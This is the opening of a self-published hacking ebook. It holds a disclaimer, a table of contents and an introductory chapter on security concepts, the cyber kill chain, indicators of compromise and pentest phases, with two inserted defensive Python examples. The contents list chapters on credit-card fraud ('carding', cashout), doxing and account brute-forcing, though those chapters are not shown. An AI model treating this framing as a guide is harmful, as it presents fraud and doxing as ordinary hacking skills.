Hacking Learn How To Hack Like Pro-V2 [PDF]


INSTAGRAM >>> HACKLIKEPRO YOUTUBE >>> MANISH PUNDER

1|Page


IMPORTANT DISCLAIMER The tools and techniques presented are open source, and thus available to everyone. Investigators and pentesters use them regularly in assignments, but so do attackers. If you recently suffered a breach and found a technique or tool illustrated in this book, this neither incriminates the author of this book in any way, nor implies any connection between the author and the perpetrators. Any actions and/or activities related to the material contained within this book are solely your responsibility. Misuse of the information in this book can result in criminal charges being brought against the persons in question. The author will not be held responsible in the event that any criminal charges are brought against any individuals using the information in this book to break the law. This book does not promote hacking, software cracking, and/or piracy. All of the information provided in this book is for educational purposes only. Performing any hack attempts or tests without written permission from the owner of the computer system is illegal.


All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews. Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author nor HackLikePro Publishing or its dealers and distributors will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

WHO THIS BOOK IS FOR

This book starts from scratch, assuming the reader has no prior knowledge of hacking/penetration testing. Therefore, it is for anybody interested in learning how to hack or test the security of systems like real hackers and secure them like security experts.

BOOK DESCRIPTION

This is a Penetration Testing & Information Security Training Book. This book will empower you with knowledge in a simplified and easily graspable manner. In the training, we teach our students how hackers break into systems, networks, mobiles, and websites to make them aware of the possible loopholes and therefore make them proficient in reverse-penetration. By doing so, they can create a virtual wall between their data and the hackers. This training will enable you to carry out attacking as well as defensive methodologies which will help you and your organization to not only protect but also assess the safety and vulnerability ratio.

READER FEEDBACK

We always welcome feedback from our students. Let us know what you think: did you find the book useful, and did you like it or not? To send feedback, simply send an email to [email protected].

PIRACY

The free flow of information on the internet has, in addition to many benefits, brought its share of problems, one of which is copyright infringement. We are well aware that we can't fight every unauthorized copy of this book. However, if you have come upon a copy of this book somewhere on the internet, we would like to invite you to take a look at our courses. We are sure that once you see the wealth of information and the knowledge you can gain, you will support us by subscribing to a course. We often provide discount coupons, making our courses very affordable.

GET IN TOUCH WITH US

Keep a connection with us; we have a lot more things for you.

Instagram: https://instagram.com/hacklikepro/
YouTube: SUBSCRIBE NOW
Telegram Channel: https://t.me/hackworm/
Telegram (Admin): https://t.me/elliotmalek/


CONTENTS

IMPORTANT DISCLAIMER ... 2
MODULE 01: INTRODUCTION TO ETHICAL HACKING ... 6
INFORMATION SECURITY OVERVIEW ... 7
MOTIVES, GOALS AND OBJECTIVES OF INFORMATION SECURITY ATTACKS ... 7
CLASSIFICATION OF ATTACKS ... 8
CYBER KILL CHAIN ... 10
INDICATORS OF COMPROMISE (IOCS) ... 12
WHAT IS HACKING? ... 13
WHO IS A HACKER? ... 14
TYPES OF HACKERS AND WHAT THEY DO? ... 14
PHASES OF HACKING ... 14
MODULE 02: HOW TO ... 18
FOOTPRINTING THROUGH SEARCH ENGINES ... 19
FOOTPRINTING USING ADVANCED GOOGLE HACKING TECHNIQUES ... 21
FOOTPRINTING THROUGH SOCIAL NETWORKING SITES ... 22
WEBSITE FOOTPRINTING ... 23
EMAIL FOOTPRINTING ... 24
WHOIS FOOTPRINTING ... 25
DNS FOOTPRINTING ... 26
NETWORK FOOTPRINTING ... 27
FOOTPRINTING TOOLS ... 28
NETWORK SCANNING ... 29
CHECK FOR LIVE SYSTEMS ... 30
CHECK FOR OPEN PORTS ... 31
SCANNING BEYOND IDS ... 38
HOW HACKERS HACK WEBCAM USING ENTROPY AND SHODAN ... 39
HOW TO HACK WINDOWS LOCKSCREEN/ADMIN PASSWORD ... 42
HOW HACKERS BYPASS GOOGLE PLAY SECURITY ... 45
HOW TO FIND OUT EXACT LOCATION OF THE PERSON USING SEEKER ... 47
HOW HIDE DATA FILES IN IMAGES USING STEGHIDE ... 54
HOW TO HACK ANDROID WITH EVILDROID ... 56
HOW TO CRACK WINDOWS 10 PASSWORD WITH OPHCRACK ... 60
HOW TO PERFORM A DOS ATTACK "SLOW HTTP" WITH SLOWHTTPTEST ... 62
HOW TO HIDE DATA IN AN AUDIO FILE ... 65
HOW TO DOX SOMEONE USING SNAPCHAT ... 65
HOW TO HACK INSTAGRAM ACCOUNT [BRUTEFORCE] ... 66
CRACK A PDF PASSWORD WITH BRUTE FORCE USING JOHN THE RIPPER ... 67
SHELLPHISH: A PHISHING TOOL ... 71
EVILGINX2 - ADVANCED PHISHING ATTACK FRAMEWORK ... 72
MODULE 03: GETTING STARTED IN BUG BOUNTY HUNTING ... 74
PHASE #01 ... 75
PHASE #02 ... 78
PHASE #03 ... 94
ENDING NOTE! ... 95
MODULE 04: ALL ABOUT CARDING ... 96
LET'S START WITH THE BASICS ... 98
TYPES OF CREDIT CARD ... 99
SETUP SOCKS PROXY IN FIREFOX ... 101
CARDING PROCESS ... 102
PERSONAL ADVICE ... 102
HOW TO GET FREE CREDIT CARD USING HAVIJ ... 103
ARE YOU FINDING A CARDABLE SITE? ... 106
CASHOUT TUTORIAL | PAYPAL - CC – BTC ... 106


MODULE 01: INTRODUCTION TO ETHICAL HACKING


INFORMATION SECURITY OVERVIEW

Information security refers to the protection or safeguarding of information, and of the information systems that use, store, and transmit it, from unauthorized access, disclosure, alteration, and destruction. Information is a critical asset that organizations must secure. If sensitive information falls into the wrong hands, the organization may suffer heavy losses in terms of finance, brand reputation, customers, or in other ways. To provide an understanding of how to secure such critical information resources, this section starts with an overview of information security. Information security programs are built around three objectives, commonly known as CIA: Confidentiality, Integrity, and Availability.

ELEMENTS OF INFORMATION SECURITY

Information security is "the state of the well-being of information and infrastructure in which the possibility of theft, tampering, or disruption of information and services is kept low or tolerable." It relies on five major elements: confidentiality, integrity, availability, authenticity, and non-repudiation.
Confidentiality - Confidentiality is the assurance that information is accessible only to those authorized to see it. Confidentiality breaches may occur due to improper data handling or a hacking attempt. Confidentiality controls include data classification, data encryption, and proper disposal of equipment and media (such as DVDs, USB drives, and Blu-ray discs).

Integrity - Integrity is the trustworthiness of data or resources in terms of preventing improper and unauthorized changes: the assurance that information is sufficiently accurate for its purpose. Measures to maintain data integrity may include a checksum (a number produced by a mathematical function to verify that a given block of data has not changed) and access control (which ensures that only authorized people can update, add, or delete data).

Availability - Availability is the assurance that the systems responsible for delivering, storing, and processing information are accessible when required by authorized users. Measures to maintain availability can include disk arrays for redundant systems, clustered machines, antivirus software to combat malware, and distributed denial-of-service (DDoS) prevention systems.

Authenticity - Authenticity refers to the characteristic of a communication, document, or any other data that ensures its quality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine. Controls such as biometrics, smart cards, and digital certificates ensure the authenticity of data, transactions, communications, and documents.

Non-Repudiation - Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent it and that the recipient cannot deny having received it. Individuals and organizations use digital signatures to ensure non-repudiation.
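As an added illustration of the integrity element above (example code written for this edition, not from the book or its author): a plain checksum, as the text describes, detects that a block of data has changed, but it goes one step further than the text by showing the caveat a practitioner cares about. Anyone who can alter the data can also recompute an unkeyed checksum, so accidental corruption is caught while deliberate tampering is not; a keyed MAC (HMAC-SHA256 here) closes that gap because a valid tag cannot be produced without the verifier's key. The record and the key are constructed for the demo and are not real values.

```python
"""Integrity checks: unkeyed checksum versus keyed MAC (added example, not from the book)."""
import hashlib
import hmac

# Constructed sample record and a placeholder verifier key (demo values only).
RECORD = b"account=1042;balance=250.00;currency=EUR"
MAC_KEY = b"demo-only-verifier-key"


def checksum(data: bytes) -> str:
    """Unkeyed SHA-256 digest: catches accidental corruption of the data."""
    return hashlib.sha256(data).hexdigest()


def verify_checksum(data: bytes, expected: str) -> bool:
    """Constant-time comparison so the check itself does not leak timing."""
    return hmac.compare_digest(checksum(data), expected)


def mac_tag(data: bytes, key: bytes) -> str:
    """Keyed HMAC-SHA256: only a holder of `key` can produce a valid tag."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_mac(data: bytes, tag: str, key: bytes) -> bool:
    return hmac.compare_digest(mac_tag(data, key), tag)


def alter_and_recompute(data: bytes) -> tuple:
    """Model a party who can change the record and recompute the unkeyed checksum."""
    altered = data.replace(b"balance=250.00", b"balance=999999.00")
    return altered, checksum(altered)


def demo() -> dict:
    original_sum = checksum(RECORD)
    original_tag = mac_tag(RECORD, MAC_KEY)
    altered, recomputed_sum = alter_and_recompute(RECORD)
    return {
        # The stored checksum no longer matches the altered record: change detected.
        "checksum_detects_change": not verify_checksum(altered, original_sum),
        # If the checksum travels with the data and is recomputed, it verifies:
        # an unkeyed checksum protects against accidents, not against an adversary.
        "recomputed_checksum_passes": verify_checksum(altered, recomputed_sum),
        # The HMAC over the altered record cannot be forged without MAC_KEY.
        "mac_rejects_altered": not verify_mac(altered, original_tag, MAC_KEY),
        "mac_accepts_original": verify_mac(RECORD, original_tag, MAC_KEY),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The design point is where the key lives: the checksum verifier needs nothing secret, so it can be recomputed by whoever modified the data, whereas the MAC verifier holds a key the modifying party does not have. Non-repudiation, the last element in the list, needs a further step (a digital signature with a private key only the sender holds), because an HMAC key is shared between sender and verifier.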

MOTIVES, GOALS AND OBJECTIVES OF INFORMATION SECURITY ATTACKS

Attackers generally have motives (goals) and objectives behind their information security attacks. A motive originates from the notion that a target system stores or processes something valuable, which leads to the threat of an attack on the system. The purpose of the attack may be to disrupt the target organization's business operations, to steal valuable information, to satisfy curiosity, or even to exact revenge. These motives or goals therefore depend on the attacker's state of mind, their reason for carrying out such an activity, and their resources and capabilities. Once the attacker determines their goal, they can employ various tools, attack techniques, and methods to exploit vulnerabilities in a computer system or in its security policy and controls.


ATTACKS = MOTIVE (GOAL) + METHOD + VULNERABILITY

Motives Behind Information Security Attacks
o Disrupt business continuity
o Manipulate data
o Damage the reputation of the target
o Create fear and chaos by disrupting critical infrastructures
o Take revenge
o Demand ransom
o Propagate religious or political beliefs
o Perform information theft
o Achieve a state's military objectives
o Bring financial loss to the target

CLASSIFICATION OF ATTACKS

According to IATF, security attacks are classified into five categories: passive, active, close-in, insider, and distribution.

Passive Attacks - Passive attacks involve intercepting and monitoring network traffic and data flow on the target network without tampering with the data. Attackers perform reconnaissance on network activities using sniffers. These attacks are very difficult to detect because the attacker has no active interaction with the target system or network. Passive attacks allow attackers to capture data or files transmitted on the network without the user's consent. For example, an attacker can obtain unencrypted data in transit, clear-text credentials, or other sensitive information that is useful in performing active attacks. Examples of passive attacks:
o Footprinting
o Sniffing and eavesdropping
o Network traffic analysis
o Decryption of weakly encrypted traffic

Active Attacks - Active attacks tamper with data in transit or disrupt communication or services between systems in order to bypass or break into secured systems. Attackers launch attacks on the target system or network by actively sending traffic, which can be detected. These attacks are performed on the target network to exploit the information in transit. They penetrate or infect the target's internal network and gain access to a remote system to compromise the internal network. Examples of active attacks:
o Denial-of-service (DoS) attack
o Firewall and IDS attack
o Bypassing protection mechanisms
o Profiling
o Malware attacks (such as viruses, worms, ransomware)
o Arbitrary code execution
o Modification of information
o Privilege escalation
o Backdoor access
o Spoofing attacks
o Cryptography attacks
o Replay attacks
o SQL injection
o Password-based attacks
o XSS attacks
o Session hijacking
o Directory traversal attacks
o Man-in-the-Middle attack
o Exploitation of application and OS software
o DNS and ARP poisoning
o Compromised-key attack

Close-in Attacks - Close-in attacks are performed when the attacker is in close physical proximity to the target system or network. The main goal of this type of attack is to gather or modify information or to disrupt access to it. For example, an attacker might shoulder surf user credentials. Attackers gain close proximity through surreptitious entry, open access, or both. Examples of close-in attacks:
o Social engineering (eavesdropping, shoulder surfing, dumpster diving, and other methods)

Insider Attacks - Insider attacks are performed by trusted persons who have physical access to the critical assets of the target. An insider attack involves using privileged access to violate rules or intentionally cause a threat to the organization's information or information systems. Insiders can easily bypass security rules, corrupt valuable resources, and access sensitive information. They misuse the organization's assets to directly affect the confidentiality, integrity, and availability of information systems. These attacks impact the organization's business operations, reputation, and profit, and they are difficult to detect. Examples of insider attacks:
o Eavesdropping and wiretapping
o Theft of physical devices
o Social engineering
o Data theft and spoliation
o Pod slurping
o Planting keyloggers, backdoors, or malware

Distribution Attacks - Distribution attacks occur when attackers tamper with hardware or software prior to installation, either at its source or while it is in transit. Examples of distribution attacks include backdoors created by software or hardware vendors at the time of manufacture. Attackers leverage these backdoors to gain unauthorized access to the target information, systems, or network. Examples of distribution attacks:
o Modification of software or hardware during production
o Modification of software or hardware during distribution


CYBER KILL CHAIN

The cyber kill chain is an efficient and effective way of illustrating how an adversary can attack the target organization. This model helps organizations understand the various possible threats at every stage of an attack and the countermeasures needed to defend against them. It also gives security professionals clear insight into the attack strategy used by the adversary, so that different levels of security controls can be implemented to protect the organization's IT infrastructure.

Cyber Kill Chain Methodology

The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities. It helps security professionals identify the steps that adversaries follow in order to accomplish their goals. The cyber kill chain is a framework developed for securing cyberspace, based on the concept of military kill chains, and it aims to actively enhance intrusion detection and response. It is equipped with a seven-phase protection mechanism to mitigate and reduce cyber threats. According to Lockheed Martin, a cyberattack proceeds through seven phases, from reconnaissance to the final accomplishment of the objective. Understanding the cyber kill chain methodology helps security professionals apply security controls at different stages of an attack and stop the attack before it succeeds.

Reconnaissance - An adversary performs reconnaissance to collect as much information about the target as possible and to probe for weak points before actually attacking. They look for publicly available information on the Internet, network information, system information, and organizational information about the target. By conducting reconnaissance across different network levels, the adversary can gain information such as network blocks, specific IP addresses, and employee details. The adversary may use automated tools to obtain information such as open ports and services, vulnerabilities in applications, and login credentials. Such information can help the adversary gain backdoor access to the target network. The following are the activities of the adversary:
o Gathering information about the target organization by searching the Internet or through social engineering
o Performing analysis of various online activities and publicly available information
o Gathering information from social networking sites and web services
o Obtaining information about websites visited
o Monitoring and analyzing the target organization's website
o Performing Whois, DNS, and network footprinting
o Performing scanning to identify open ports and services

Weaponization - The adversary analyzes the data collected in the previous stage to identify vulnerabilities and techniques that can be exploited to gain unauthorized access to the target organization. Based on the vulnerabilities identified during analysis, the adversary selects or creates a tailored deliverable malicious payload (a remote-access malware weapon) using an exploit and a backdoor, to be sent to the victim. An adversary may target specific network devices, operating systems, endpoint devices, or even individuals within the organization to carry out the attack. For example, the adversary may send a phishing email to an employee of the target organization that includes a malicious attachment such as a virus or worm which, when downloaded, installs a backdoor on the system and gives the adversary remote access. The following are the activities of the adversary:
o Identifying an appropriate malware payload based on the analysis
o Creating a new malware payload, or selecting, reusing, or modifying available malware payloads based on the identified vulnerability
o Creating a phishing email campaign
o Leveraging exploit kits and botnets

Delivery - The weapon created in the previous stage is transmitted to the intended victim(s) as an email attachment, via a malicious link on a website, or through a vulnerable web application or USB drive. Delivery is a key stage that measures the effectiveness of the defense strategies implemented by the target organization, based on whether or not the adversary's intrusion attempt is blocked. The following are the activities of the adversary:
o Sending phishing emails to employees of the target organization
o Distributing USB drives containing a malicious payload to employees of the target organization
o Performing attacks such as watering hole attacks on a compromised website
o Implementing various hacking tools against the operating systems, applications, and servers of the target organization

Exploitation - After the weapon is transmitted to the intended victim, exploitation triggers the adversary's malicious code to exploit a vulnerability in the operating system, application, or server on a target system. At this stage, the organization may face threats such as authentication and authorization attacks, arbitrary code execution, physical security threats, and security misconfiguration. The following are the activities of the adversary:
o Exploiting software or hardware vulnerabilities to gain remote access to the target system

Installation - The adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period. They may use the weapon to install a backdoor that provides remote access. After injecting malicious code on one target system, the adversary gains the capability to spread the infection to other end systems in the network. The adversary also tries to hide the presence of malicious activity from security controls such as firewalls, using techniques such as encryption. The following are the activities of the adversary:
o Downloading and installing malicious software such as backdoors
o Gaining remote access to the target system
o Leveraging various methods to keep the backdoor hidden and running
o Maintaining access to the target system

Command and Control - The adversary creates a command and control channel, which establishes two-way communication between the victim's system and an adversary-controlled server to pass data back and forth. Adversaries use techniques such as encryption to hide the presence of such channels. Using this channel, the adversary performs remote exploitation on the target system or network. The following are the activities of the adversary:
o Establishing a two-way communication channel between the victim's system and the adversary-controlled server
o Leveraging channels such as web traffic, email communication, and DNS messages
o Applying privilege escalation techniques
o Hiding any evidence of compromise using techniques such as encryption

Actions on Objectives - The adversary controls the victim's system from a remote location and finally accomplishes their intended goals. The adversary gains access to confidential data, disrupts services or the network, or destroys the operational capability of the target by gaining access to its network and compromising more systems. The adversary may also use this as a launching point to perform other attacks.
INDICATORS OF COMPROMISE (IOCS)

Cyber threats are continuously evolving, with newer TTPs adapted to the vulnerabilities of the target organization. Security professionals must continuously monitor IoCs to detect and respond to evolving cyber threats effectively and efficiently. Indicators of Compromise are the clues, artifacts, and pieces of forensic data found on an organization's network or operating systems that indicate a potential intrusion or malicious activity in the organization's infrastructure. IoCs are not intelligence in themselves; rather, they are a good source of information about threats and serve as data points in the intelligence process. Actionable threat intelligence extracted from IoCs helps organizations enhance their incident-handling strategies. Cybersecurity professionals use various automated tools to monitor IoCs in order to detect and prevent security breaches. Monitoring IoCs also helps security teams enhance the organization's security controls and policies so that suspicious traffic is detected and blocked, thwarting further attacks. To address these threats, some organizations have developed standardized reports, based on standards such as STIX and TAXII, that condense data related to attacks and share it with others to support incident response.

An IoC is an atomic indicator, a computed indicator, or a behavioral indicator. It is information about suspicious or malicious activity collected from the various security systems in a network's infrastructure. Atomic indicators are those that cannot be segmented into smaller parts and whose meaning does not change in the context of an intrusion; examples are IP addresses and email addresses. Computed indicators are obtained from data extracted from a security incident; examples are hash values and regular expressions. Behavioral indicators are a grouping of both atomic and computed indicators, combined on the basis of some logic.

CATEGORIES OF INDICATORS OF COMPROMISE

Cybersecurity professionals must have proper knowledge of the various possible threat actors and their tactics, the traces of which are commonly called Indicators of Compromise (IoCs). This understanding of IoCs helps security professionals quickly detect threats entering the organization and protect it from evolving threats. For this purpose, IoCs are divided into four categories:

Email Indicators - Attackers usually prefer email services to send malicious data to the target organization or individual. Such socially engineered emails are preferred due to their ease of use and comparative anonymity. Examples of email indicators include the sender's email address, the email subject, and attachments or links.

Network Indicators - Network indicators are useful for detecting command and control and malware delivery, and for identifying details about the operating system, browser type, and other computer-specific information. Examples of network indicators include URLs, domain names, and IP addresses.

Host-Based Indicators - Host-based indicators are found by analyzing an infected system within the organizational network. Examples of host-based indicators include filenames, file hashes, registry keys, DLLs, and mutexes.

Behavioral Indicators - Typical IoCs are useful for identifying signs of intrusion such as malicious IP addresses, virus signatures, MD5 hashes, and domain names. Behavioral IoCs are used to identify specific behavior related to malicious activity, such as code injection into memory or running the scripts of an application. Well-defined behaviors enable broad protection that blocks all current and future malicious activity of that kind. These indicators are useful for identifying when legitimate system services are used for abnormal or unexpected activities. Examples of behavioral indicators include a document executing a PowerShell script, and remote command execution.

Listed below are some of the key Indicators of Compromise (IoCs):

o Unusual outbound network traffic
o Unusual activity through a privileged user account
o Geographical anomalies
o Multiple login failures
o Increased database read volume
o Large HTML response size
o Multiple requests for the same file
o Mismatched port-application traffic
o Suspicious registry or system file changes
o Unusual DNS requests
o Unexpected patching of systems
o Signs of Distributed Denial-of-Service (DDoS) activity
o Bundles of data in the wrong places
o Web traffic with superhuman behavior
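As an added example (not from the book), the following Python script runs detection logic for two of the indicators above, multiple login failures and geographical anomalies, over a few constructed authentication log lines; the log format, user names, IP addresses and the GeoIP table are all assumptions made for the example.

```python
"""Detect two of the listed IoCs from constructed authentication log lines.

Added example, not from the book. It flags "Multiple login failures"
(N failures for one account inside a sliding window) and "Geographical
anomalies" (one account logging in from two countries within a short window).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed mapping of source IPs to countries, standing in for a GeoIP lookup.
GEOIP = {
    "203.0.113.7": "IN",
    "198.51.100.23": "US",
    "192.0.2.55": "BR",
}

# Constructed log lines in a simple "timestamp user source_ip result" format.
SAMPLE_LOG = """\
2024-03-01T09:00:01 alice 203.0.113.7 FAIL
2024-03-01T09:00:05 alice 203.0.113.7 FAIL
2024-03-01T09:00:09 alice 203.0.113.7 FAIL
2024-03-01T09:00:14 alice 203.0.113.7 FAIL
2024-03-01T09:00:20 alice 203.0.113.7 FAIL
2024-03-01T09:00:31 alice 203.0.113.7 OK
2024-03-01T10:15:00 bob 198.51.100.23 OK
2024-03-01T10:40:00 bob 192.0.2.55 OK
2024-03-01T11:00:00 carol 198.51.100.23 FAIL
2024-03-01T11:30:00 carol 198.51.100.23 OK
"""


def parse_log(text):
    """Turn the raw lines into (timestamp, user, ip, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, result = line.split()
        events.append((datetime.fromisoformat(ts), user, ip, result))
    return events


def multiple_login_failures(events, threshold=5, window=timedelta(minutes=5)):
    """Return the users with at least `threshold` FAIL events inside `window`."""
    fails = defaultdict(list)
    for ts, user, _ip, result in events:
        if result == "FAIL":
            fails[user].append(ts)
    flagged = set()
    for user, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Slide the window start forward until it fits inside `window`.
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(user)
                break
    return flagged


def geographical_anomalies(events, window=timedelta(hours=1)):
    """Return (user, country_a, country_b) for consecutive successful logins
    from two different countries within `window` (the GeoIP table is constructed)."""
    logins = defaultdict(list)
    for ts, user, ip, result in events:
        if result == "OK":
            logins[user].append((ts, GEOIP.get(ip, "??")))
    anomalies = []
    for user, entries in logins.items():
        entries.sort()
        for i in range(1, len(entries)):
            prev_ts, prev_cc = entries[i - 1]
            ts, cc = entries[i]
            if cc != prev_cc and ts - prev_ts <= window:
                anomalies.append((user, prev_cc, cc))
    return anomalies


def analyze(text):
    """Run both detectors over a log and return their findings."""
    events = parse_log(text)
    return {
        "multiple_login_failures": sorted(multiple_login_failures(events)),
        "geographical_anomalies": geographical_anomalies(events),
    }


if __name__ == "__main__":
    for name, hits in analyze(SAMPLE_LOG).items():
        print(f"{name}: {hits}")
```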

WHAT IS HACKING?

Hacking in the field of computer security refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources. It involves modifying system or application features to achieve a goal outside its creator’s original purpose. Hacking can be done to steal, pilfer, or redistribute intellectual property, thus leading to business loss. Hacking on computer networks is generally done using scripts or other network programming. Network hacking techniques include creating viruses and worms, performing denial-of-service (DoS) attacks, establishing unauthorized remote access connections to a device using trojans or backdoors, creating botnets, packet sniffing, phishing, and password cracking. The motive behind hacking could be to steal critical information or services, or thrill, intellectual challenge, curiosity, experiment, knowledge, financial gain, prestige, power, peer recognition, vengeance and vindictiveness, among other reasons.


WHO IS A HACKER?

A hacker is a person who breaks into a system or network without authorization to destroy, steal sensitive data, or perform malicious attacks. A hacker is an intelligent individual with excellent computer skills, along with the ability to create and explore the computer’s software and hardware. Usually, a hacker is a skilled engineer or programmer with enough knowledge to discover vulnerabilities in a target system. They generally have subject expertise and enjoy learning the details of various programming languages and computer systems. For some hackers, hacking is a hobby to see how many computers or networks they can compromise. Their intention can either be to gain knowledge or to poke around to do illegal things. Some hack with malicious intent behind their escapades, like stealing business data, credit card information, social security numbers, and email passwords.

TYPES OF HACKERS AND WHAT THEY DO

Hackers usually fall into one of the following categories, according to their knowledge and activities:

o Black Hats: Black hats are individuals who use their extraordinary computing skills for illegal or malicious purposes. This category of hacker is often involved in criminal activities. They are also known as crackers.

o White Hats: White hats or penetration testers are individuals who use their hacking skills for defensive purposes. These days, almost every organization has security analysts who are knowledgeable about hacking countermeasures, which can secure its network and information systems against malicious attacks. They have permission from the system owner.

o Gray Hats: Gray hats are individuals who work both offensively and defensively at various times. Gray hats might help hackers to find various vulnerabilities in a system or network and, at the same time, help vendors to improve products (software or hardware) by checking limitations and making them more secure.

o Suicide Hackers: Suicide hackers are individuals who aim to bring down critical infrastructure for a “cause” and are not worried about facing jail terms or any other kind of punishment. Suicide hackers are similar to suicide bombers who sacrifice their life for an attack and are thus not concerned with the consequences of their actions.

o Script Kiddies: Script kiddies are unskilled hackers who compromise systems by running scripts, tools, and software developed by real hackers. They usually focus on the quantity rather than the quality of the attacks that they initiate.

o Cyber Terrorists: Cyber terrorists are individuals with a wide range of skills, motivated by religious or political beliefs, to create fear of large-scale disruption of computer networks.

o State-Sponsored Hackers: State-sponsored hackers are individuals employed by a government to penetrate, gain top-secret information from, and damage the information systems of other governments.

o Hacktivists: Hacktivism is when hackers break into government or corporate computer systems as an act of protest. Hacktivists use hacking to increase awareness of their social or political agendas, as well as to boost their own reputations in both the online and offline arenas. They are individuals who use hacking to promote a political agenda, especially by defacing or disabling websites. Common hacktivist targets include government agencies, multinational corporations, and any other entity that they perceive as a threat. Irrespective of the hacktivists’ intentions, gaining unauthorized access is a crime.

PHASES OF HACKING

An Ethical Hacker is also known as a Penetration Tester in the industry. Ethical hackers are proficient with the penetration testing lifecycle. An organization hires ethical hackers so that they can conduct several penetration tests on the organization’s digital infrastructure with the management’s approval and discover vulnerabilities in the system so that they can be patched before a real attacker targets the system.

There is a common misconception among the masses that an ethical hacker or a penetration tester just needs to sit at a computer, run a piece of code, and they can gain access to any system in the world. People have this notion mostly because of things they see in movies, but it is far from the truth. Professionals in this field are very careful and precise in their approach to discovering and understanding exploits in a computer system. Over the years, a definite framework has been established, which has been adopted by ethical hackers. The first four stages of this framework guide an ethical hacker to discover vulnerabilities in a system and understand to what level these vulnerabilities can be exploited. The final stage documents the actions of the first four stages in a neat report to be presented to the senior management of the organization. This framework has not only created a proper planning and execution structure for an ethical hacker, but has also proved to be very efficient for conducting penetration tests at multiple levels of an organization’s digital infrastructure. Every stage gathers inputs from the previous stage and further provides inputs to the next stage. The process runs in a sequence, but it is not uncommon for ethical hackers to return to a previous stage to analyze previously discovered information.

THE FIVE STAGES OF THE PENETRATION TESTING LIFECYCLE

We will discuss the five stages of the penetration testing lifecycle with an analogy to the functioning of an army in a war situation on the international borders.

1. Hacking Phase: Reconnaissance

Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack. In this phase, the attacker draws on competitive intelligence to learn more about the target. It could be the future point of return, noted for ease of entry for an attack when more about the target is known on a broad scale. The reconnaissance target range may include the target organization’s clients, employees, operations, network, and systems. This phase allows attackers to plan the attack. It may take some time as the attacker gathers as much information as possible. Part of this reconnaissance may involve social engineering. A social engineer is a person who convinces people to reveal information such as unlisted phone numbers, passwords, and other sensitive information. For instance, the hacker could call the target’s Internet service provider and, using personal information previously obtained, convince the customer service representative that the hacker is actually the target, and in doing so, obtain even more information about the target. Another reconnaissance technique is dumpster diving. Dumpster diving is, simply enough, looking through an organization’s trash for any discarded sensitive information. Attackers can use the Internet to obtain information such as employees’ contact information, business partners, technologies currently in use, and other critical business knowledge. Dumpster diving may provide attackers with even more sensitive information, such as usernames, passwords, credit card statements, bank statements, ATM receipts, Social Security numbers, private telephone numbers, checking account numbers, or other sensitive data. Searching for the target company’s web site in the Internet’s Whois database can easily provide hackers with the company’s IP addresses, domain names, and contact information.

Reconnaissance Types

Reconnaissance techniques are broadly categorized into active and passive. When an attacker is using passive reconnaissance techniques, they do not interact with the target directly. Instead, the attacker relies on publicly available information, news releases, or other no-contact methods. Active reconnaissance techniques, on the other hand, involve direct interactions with the target system by using tools to detect open ports, accessible hosts, router locations, network mapping, details of operating systems, and applications.

Attackers use active reconnaissance when there is a low probability of the detection of these activities. For example, they may make telephone calls to the help desk or technical department. As an ethical hacker, it is important to be able to distinguish among the various reconnaissance methods and advocate preventive measures in the light of potential threats. Companies, on their part, must address security as an integral part of their business and operational strategies, and be equipped with the proper policies and procedures to check for potential vulnerabilities.

2. Hacking Phase: Scanning

Scanning is the phase immediately preceding the attack. Here, the attacker uses the details gathered during reconnaissance to scan the network for specific information. Scanning is a logical extension of active reconnaissance, and in fact, some experts do not differentiate scanning from active reconnaissance. There is a slight difference, however, in that scanning involves more in-depth probing on the part of the attacker. Often the reconnaissance and scanning phases overlap, and it is not always possible to separate the two. An attacker can gather critical network information such as the mapping of systems, routers, and firewalls by using simple tools such as the standard Windows utility Traceroute. Alternatively, they can use tools such as Cheops to add additional information to Traceroute’s results. Scanning can include the use of dialers, port scanners, network mappers, ping tools, vulnerability scanners, or other tools. Attackers extract information such as live machines, ports, port status, OS details, device type, and system uptime to launch an attack. Port scanners detect listening ports to find information about the nature of services running on the target machine. The primary defense technique against port scanners is shutting down services that are not required and implementing appropriate port filtering. However, attackers can still use tools to determine the rules implemented by the port filtering. The most commonly used tools are vulnerability scanners, which can search for thousands of known vulnerabilities on a target network. This gives the attacker an advantage because he or she only has to find a single means of entry, while the systems professional has to secure as many vulnerabilities as possible by applying patches. Organizations that use intrusion detection systems still have to remain vigilant because attackers can and will use evasion techniques wherever possible.

3. Hacking Phase: Gaining Access

This is the phase in which real hacking occurs. Attackers use vulnerabilities identified during the reconnaissance and scanning phases to gain access to the target system and network. Gaining access refers to the point where the attacker obtains access to the operating system or to applications on the computer or network. The attacker can gain access at the operating system, application, or network level. Even though attackers can cause plenty of damage without gaining any access to the system, the impact of unauthorized access is catastrophic. For instance, external denial-of-service attacks can either exhaust resources or stop services from running on the target system. Ending processes can stop a service, using a logic bomb or time bomb, or even reconfigure and crash the system. Furthermore, attackers can exhaust system and network resources by consuming all outgoing communication links. Attackers gain access to the target system locally (offline), over a LAN, or over the Internet. Examples include password cracking, stack-based buffer overflows, denial-of-service, and session hijacking. Using a technique called spoofing to exploit the system by pretending to be a legitimate user or a different system, attackers can send a data packet containing a bug to the target system in order to exploit a vulnerability. Packet flooding also breaks the availability of essential services. Smurf attacks attempt to cause users on a network to flood each other with data, making it appear as if everyone is attacking each other, and leaving the hacker anonymous.

